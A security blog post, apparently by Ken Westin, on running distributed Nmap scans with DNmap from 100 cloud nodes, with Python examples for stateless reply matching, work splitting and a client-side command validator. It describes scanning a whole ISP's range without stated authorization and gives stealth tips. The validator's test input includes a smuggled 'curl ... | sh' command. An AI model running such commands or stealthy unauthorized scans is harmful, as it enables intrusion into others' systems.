Vulnerability Management

Distributed Nmap Port Scanning with a DNmap Megacluster

The legally dubious Carna Botnet and Internet Census 2012 took advantage of Internet-facing systems running Telnet with the credentials root:root. Hijacking those systems let the anonymous researcher(s) quickly assemble a botnet of scanners that covered the entire IPv4 address space in a remarkably short time.

I was curious whether a similar system could be built that was, for starters, legal and, although much smaller in scope, flexible enough to run various types of scans. Nmap is an incredibly powerful tool used by security professionals and system administrators to scan networks for vulnerabilities, audit systems and more.

One issue with Nmap is that it is stateful: for every probe it sends it keeps a record (timing, retransmission count, congestion state) while it waits for the target to reply. Probes go out in parallel, but Nmap still has to track every outstanding one and adapt its rate to what comes back, which caps how fast it can scan.

Newer stateless scanners such as ZMap from the University of Michigan and Masscan from Robert Graham of Errata Security avoid this bookkeeping. Instead of remembering which probes are outstanding, they encode a value derived from the target (in the style of a SYN cookie, carried in the TCP sequence number or source port) into each probe, so a reply can be matched to its request by recomputation alone rather than by keeping a connection open. The result is extremely fast scanning.

Screenshot from Errata Security showing Masscan running at 24 million packets/second

These stateless tools are fast, but scanning a massive number of systems still needs a lot of bandwidth, and more complex scans (anything that has to complete a handshake and talk to the service, such as version detection) still require stateful connections. Nmap also provides a powerful scripting engine (NSE) that lets the brave extend the capabilities and logic of their scans.
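To make the stateful/stateless distinction concrete, here is a small added example (my own illustration, not code from ZMap, Masscan or this post) of the SYN-cookie style bookkeeping stateless scanners rely on: the sequence number of every probe is a keyed hash of the target, so when a SYN-ACK or RST comes back the scanner recomputes the hash from the packet's source address and port and compares it with the acknowledgement number, with no table of outstanding probes at all. Packet I/O is left out; build_syn, classify_reply and the decoded-header dicts are simplifications of mine, and the replies are constructed test data, not captured traffic.

```python
import hashlib
import hmac
import ipaddress
import os
import struct

# TCP flag bits as they appear in the header's flags byte.
SYN, RST, ACK = 0x02, 0x04, 0x10

# Per-run secret (constructed here). Without it nobody can forge a reply that
# passes the check below, so no table of "probes I have sent" is needed.
SECRET = os.urandom(16)


def probe_cookie(dst_ip: str, dst_port: int, secret: bytes = SECRET) -> int:
    """32-bit sequence number for the SYN aimed at dst_ip:dst_port.

    It is a keyed hash of the target, so it can be recomputed later from the
    reply's source address and port alone.
    """
    msg = ipaddress.ip_address(dst_ip).packed + struct.pack("!H", dst_port)
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    return struct.unpack("!I", digest[:4])[0]


def build_syn(dst_ip: str, dst_port: int) -> dict:
    """Minimal decoded SYN header (a dict stands in for the real packet)."""
    return {"dst": dst_ip, "dport": dst_port, "flags": SYN,
            "seq": probe_cookie(dst_ip, dst_port)}


def classify_reply(pkt: dict, secret: bytes = SECRET):
    """Statelessly decide whether an inbound TCP segment answers one of our probes.

    pkt is a decoded header with keys src, sport, flags, ack. A genuine reply
    acknowledges our sequence number + 1; anything else (unsolicited traffic,
    a spoofed reply, a reply forged without the secret) is dropped.
    Returns "open", "closed" or None.
    """
    expected = (probe_cookie(pkt["src"], pkt["sport"], secret) + 1) & 0xFFFFFFFF
    if pkt["ack"] != expected:
        return None
    if pkt["flags"] & SYN and pkt["flags"] & ACK:
        return "open"        # SYN-ACK: something is listening
    if pkt["flags"] & RST:
        return "closed"      # RST: host reachable, port closed
    return None


def make_reply(src: str, sport: int, flags: int, ack=None) -> dict:
    """Construct a decoded reply header for the demo (test data, not captured traffic)."""
    if ack is None:
        ack = (probe_cookie(src, sport) + 1) & 0xFFFFFFFF
    return {"src": src, "sport": sport, "flags": flags, "ack": ack}


def scan(targets, inbound) -> dict:
    """Send every probe without retaining state, then classify whatever comes back."""
    for ip, port in targets:
        build_syn(ip, port)  # would go on the wire; nothing about it is remembered
    results = {}
    for pkt in inbound:
        verdict = classify_reply(pkt)
        if verdict is not None:
            results.setdefault((pkt["src"], pkt["sport"]), verdict)
    return results


def demo() -> dict:
    targets = [("198.51.100.7", 8080), ("198.51.100.9", 8080)]  # constructed
    inbound = [
        make_reply("198.51.100.7", 8080, SYN | ACK),            # genuine: open
        make_reply("198.51.100.9", 8080, RST),                  # genuine: closed
        # wrong ack number: forged or unrelated traffic, must be ignored
        make_reply("198.51.100.9", 8080, SYN | ACK,
                   ack=(probe_cookie("198.51.100.9", 8080) + 2) & 0xFFFFFFFF),
    ]
    return scan(targets, inbound)


if __name__ == "__main__":
    print(demo())
```

The price of this design is visible in scan(): because nothing is retained, there is no retransmission, so a SYN lost on the wire is simply a missing result, and anything that needs a completed handshake has to fall back to a stateful scanner such as Nmap.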

DNmap: Distributed Nmap Scanning

DNmap distributed scan example

To speed things up, I wanted a distributed cluster of systems to run my Nmap scans. Luckily, a powerful utility that does exactly that already exists: DNmap, developed by Seb Garcia, makes distributed scans fairly easy. The only requirements to run the scripts are Python and two Python libraries, python-openssl and python-twisted.

For my DNmap server I used a Linode virtual server, which worked perfectly and held up just fine with 100 DNmap clients passing data back and forth to it.

For my DNmap client cluster I leveraged CPUsage. Using their infrastructure I set up a sandbox, installed the dependencies and scripted the instructions for the nodes. Within a few minutes I had 100 nodes up and communicating with my DNmap server, scanning across an entire ISP.

The complete scan took about an hour; on a single system it would have taken at least a week. My scan targeted the entire IP range of a popular ISP on port 8080, looking for specific values in http-auth headers.

The DNmap server provides a simple UI showing the nodes connected to the server and their status, the number of commands each has run and other useful stats.
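The DNmap server reads one nmap command line per line from a file and hands them out to clients one at a time. As an added example (my own code, not DNmap's or the author's), the following generates such a file for a scan like the one described, one /24 per command so that a node that dies forfeits only a small unit of work, and then filters the resulting Nmap XML for hosts whose http-auth script output matches a pattern. The output-file layout (-oX results/unitNNNN.xml) is my assumption, and SAMPLE_XML is constructed to look like nmap -oX output for three hosts rather than taken from a real scan.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET


def work_units(cidr: str, prefix: int = 24) -> list:
    """Split a target range into /prefix subnets; each becomes one nmap command.

    Small units mean a node that dies mid-scan forfeits little work, and the
    server can hand the same unit to another node.
    """
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen >= prefix:
        return [str(net)]
    return [str(sub) for sub in net.subnets(new_prefix=prefix)]


def nmap_commands(cidr: str, port: int = 8080, script: str = "http-auth",
                  timing: str = "-T3", outdir: str = "results") -> list:
    """One nmap command line per work unit, in the one-command-per-line form the server reads."""
    cmds = []
    for i, unit in enumerate(work_units(cidr)):
        cmds.append(
            f"nmap -Pn -n -p {port} --open --script {script} {timing} "
            f"-oX {outdir}/unit{i:04d}.xml {unit}"
        )
    return cmds


def write_commands(path: str, cmds: list) -> None:
    """Write the commands file that dnmap_server.py is pointed at."""
    with open(path, "w") as fh:
        fh.write("\n".join(cmds) + "\n")


# Constructed sample of nmap -oX output for three hosts (assumed layout, not a real scan).
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="198.51.100.7" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/>
      <script id="http-auth" output="HTTP/1.1 401 Unauthorized&#xa;  Basic realm=Router Admin"/>
    </port></ports></host>
  <host><status state="up"/><address addr="198.51.100.9" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/>
      <script id="http-auth" output="HTTP/1.1 401 Unauthorized&#xa;  Digest realm=Proxy"/>
    </port></ports></host>
  <host><status state="up"/><address addr="198.51.100.10" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="8080"><state state="closed" reason="reset"/></port></ports></host>
</nmaprun>
"""


def matching_hosts(xml_text: str, pattern: str, script_id: str = "http-auth") -> list:
    """(address, port) pairs whose open port carried script output matching pattern."""
    rx = re.compile(pattern)
    hits = []
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address").get("addr")
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            for scr in port.findall("script"):
                if scr.get("id") == script_id and rx.search(scr.get("output", "")):
                    hits.append((addr, int(port.get("portid"))))
    return hits


if __name__ == "__main__":
    write_commands("commands.txt", nmap_commands("198.51.100.0/22"))  # 4 units
    print(matching_hosts(SAMPLE_XML, r"Basic realm=Router Admin"))
```

Once every unit has finished, concatenating the per-unit results through matching_hosts() gives the hit list; -Pn and -n keep each unit from spending time on host discovery and reverse DNS, which matters when the work is spread over a hundred nodes. Check how your DNmap version handles per-command output files before relying on the -oX path above.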

Scanner Lightly

Distributing the scan this way also spreads it across many source IP addresses, which makes it more efficient and a little less obvious to the target. Since compute is not the bottleneck, you can also afford the slower, stealthier scanning options Nmap offers, such as its conservative timing templates and scan delays.

The DNmap server manages the distribution of commands and stores its progress, so if a scan is interrupted or a client quits it will resume where it left off. The connection between client and server is encrypted, so the traffic itself has some protection, but it is important to note that DNmap clients will run any command the server gives them: whoever controls, or compromises, the server effectively has a shell on every node. Run the clients under an unprivileged account on disposable systems, and point them only at a server you control.
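Since a client executes whatever the server sends, a cheap hardening step is to have the client refuse anything that is not a plain nmap invocation built from an allow-list of options before it spawns a process. This added check is my own illustration and not part of DNmap: ALLOWED_OPTS is a starting point you would trim to the options your scan actually needs (targets must be IPs or CIDRs, so no hostnames), and run_checked is a hypothetical stand-in for the client's command execution.

```python
import ipaddress
import re
import shlex
import subprocess

# Characters that only matter if the command were handed to a shell. We never
# use one, but their presence in a server-supplied command is itself a red flag.
SHELL_META = set(";&|`$<>(){}\n")

# Options a scan like the one in the post needs; trim to taste. Anything else is
# refused, including -iL (read targets from a file) and --script with a path.
ALLOWED_OPTS = {"-sS", "-sT", "-sV", "-Pn", "-n", "--open",
                "-T0", "-T1", "-T2", "-T3", "-T4", "-T5",
                "-p", "--script", "--max-rate", "--scan-delay",
                "-oX", "-oN", "-oG"}
OPTS_WITH_VALUE = {"-p", "--script", "--max-rate", "--scan-delay", "-oX", "-oN", "-oG"}

SCRIPT_NAME = re.compile(r"^[A-Za-z0-9_,*.-]+$")          # script/category names, never a path
OUTFILE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_./-]*$")   # relative path, sane characters
PORTSPEC = re.compile(r"^[0-9,-]+$")
RATE = re.compile(r"^[0-9]+(ms|s|m|h)?$")


def _check_value(opt: str, val: str) -> None:
    if opt == "--script" and not SCRIPT_NAME.match(val):
        raise ValueError("--script must name a script or category, not a path")
    if opt in ("-oX", "-oN", "-oG") and (not OUTFILE.match(val) or ".." in val):
        raise ValueError("output file must be a relative path without '..'")
    if opt == "-p" and not PORTSPEC.match(val):
        raise ValueError("bad port specification")
    if opt in ("--max-rate", "--scan-delay") and not RATE.match(val):
        raise ValueError("bad rate or delay")


def check_command(cmd: str) -> list:
    """Return argv for cmd if it is an acceptable nmap invocation, else raise ValueError."""
    if any(ch in SHELL_META for ch in cmd):
        raise ValueError("shell metacharacter in command")
    argv = shlex.split(cmd)
    if not argv or argv[0] != "nmap":
        raise ValueError("only plain nmap invocations are accepted")
    targets = 0
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-"):
            opt, _, inline = tok.partition("=")
            if opt not in ALLOWED_OPTS:
                raise ValueError(f"option not on the allow-list: {opt}")
            if opt in OPTS_WITH_VALUE:
                if inline:
                    val = inline
                else:
                    i += 1
                    if i >= len(argv):
                        raise ValueError(f"{opt} needs a value")
                    val = argv[i]
                _check_value(opt, val)
        else:
            ipaddress.ip_network(tok, strict=False)  # ValueError unless an IP or CIDR
            targets += 1
        i += 1
    if targets == 0:
        raise ValueError("no target given")
    return argv


def is_allowed(cmd: str) -> bool:
    """Convenience wrapper: True if check_command accepts cmd."""
    try:
        check_command(cmd)
        return True
    except ValueError:
        return False


def run_checked(cmd: str) -> int:
    """Hypothetical replacement for the client's exec: validate, then spawn without a shell."""
    return subprocess.run(check_command(cmd), shell=False).returncode


if __name__ == "__main__":
    for c in ("nmap -Pn -n -p 8080 --open --script http-auth -oX unit0000.xml 198.51.100.0/24",
              "nmap --script /tmp/evil.nse 198.51.100.1",
              "nmap -p 80 198.51.100.1; curl http://198.51.100.1/x | sh"):
        print(is_allowed(c), c)
```

The check deliberately sits before the process is spawned and passes the parsed argv to subprocess with shell=False, so even an accepted command cannot grow a second one. Note that it does not make a compromised server harmless: a server can still direct the node's scanning wherever it likes, which is why the clients belong on systems you can afford to lose.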

My initial scanning experiments were successful. The next step is to see whether I can ramp the scan up to 1,000 nodes or more, and to test running stateless scanners in the distributed environment to increase performance for some types of scans.

Ideally, stateless scanners would run the initial sweep to find hosts that are up, and Nmap would then do the in-depth scanning of the live hosts that meet various conditions, including custom NSE scripts.

Ken Westin

Your Pundit of Paranoia